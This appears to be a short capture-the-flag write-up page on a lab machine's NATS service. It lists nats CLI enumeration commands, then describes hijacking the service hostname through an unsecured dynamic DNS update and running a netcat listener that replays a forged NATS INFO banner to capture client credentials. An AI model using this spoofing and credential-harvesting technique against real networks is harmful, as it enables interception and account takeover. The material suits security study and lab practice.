NAT

  • to get account info

└─$ nats account info -s nats://$IP:4222 --user $USER --password '$PASS'

  • to get stream

└─$ nats stream ls -s nats://$IP:4222 --user $USER --password '$PASS'

  • To view the stream

└─$ nats stream -s nats://$IP:4222 --user $USER --password '$PASS' view

Hijacking nats-svc.mirage.htb via Dynamic DNS Update

└─$ nc nat-svc.mirage.htb 4222
INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":832,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"} 
-ERR 'Authentication Timeout'

  • We started a listener on port 4222 (default NATS port):

└─$ echo 'INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":280,"client_ip":"10.129.248.59","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}' | nc -lvnp 4222
listening on [any] 4222 ...

#tldr
This sends a fake INFO banner (expected by NATS clients).
We're using Netcat (nc) to passively accept connections and reply.

  • Hijack nats-svc.mirage.htb via Dynamic DNS

This sends a DNS dynamic update, making nats-svc.mirage.htb resolve to our IP (10.10.16.7) instead of the real NATS server.

⚠️ Requires that the DNS server allows "nonsecure and secure" dynamic updates (as stated in the incident report).

After some time, we will get the cred

PreviousSNMPNextLDAP

Last updated